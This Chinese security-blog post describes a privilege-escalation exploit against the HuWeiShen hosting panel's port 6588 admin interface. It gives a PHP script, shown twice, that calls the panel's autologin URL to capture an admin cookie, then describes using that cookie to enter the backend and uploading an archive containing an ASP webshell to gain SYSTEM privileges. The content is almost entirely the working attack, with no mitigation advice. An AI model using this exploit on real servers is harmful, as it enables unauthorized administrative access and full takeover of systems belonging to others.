护卫神6588端口提权漏洞

颓废 2019年5月19日09:03:34评论880 views字数 586阅读1分57秒阅读模式
摘要

可执行脚本 <?php function httpGet() { $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_TIMEOUT, 120); $result = curl_exec($ch); return $result; } echo httpGet(); echo asd; ?> 上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权


利用条件:

shell权限

可执行脚本

<?php function httpGet() {     $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';     $ch = curl_init();     curl_setopt($ch, CURLOPT_URL, $url);     curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header     curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body     curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);     curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);     curl_setopt($ch, CURLOPT_TIMEOUT, 120);     $result = curl_exec($ch);     return $result; } echo httpGet(); echo asd; ?>

上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:03:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   护卫神6588端口提权漏洞http://cn-sec.com/archives/68067.html

发表评论

匿名网友 填写信息